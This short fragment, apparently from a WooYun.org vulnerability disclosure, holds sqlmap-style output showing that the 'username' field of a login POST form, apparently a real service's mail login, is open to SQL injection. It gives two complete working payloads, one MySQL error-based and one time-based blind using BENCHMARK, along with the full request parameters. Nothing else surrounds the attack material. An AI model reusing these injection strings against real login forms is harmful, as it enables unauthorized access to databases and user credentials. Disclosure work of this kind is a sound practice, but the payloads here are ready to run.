WooYun.org

---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: redirect_url=SEVl&username=' AND (SELECT 2546 FROM(SELECT COUNT(*),CONCAT(0x7175717071,(SELECT (CASE WHEN (2546=2546) THEN 1 ELSE 0 END)),0x716d666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iAQt'='iAQt&mailservice=myhexin&password=AsDl&referer=1
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: redirect_url=SEVl&username=' AND 7960=BENCHMARK(5000000,MD5(0x617a546f)) AND 'vXcs'='vXcs&mailservice=myhexin&password=AsDl&referer=1
---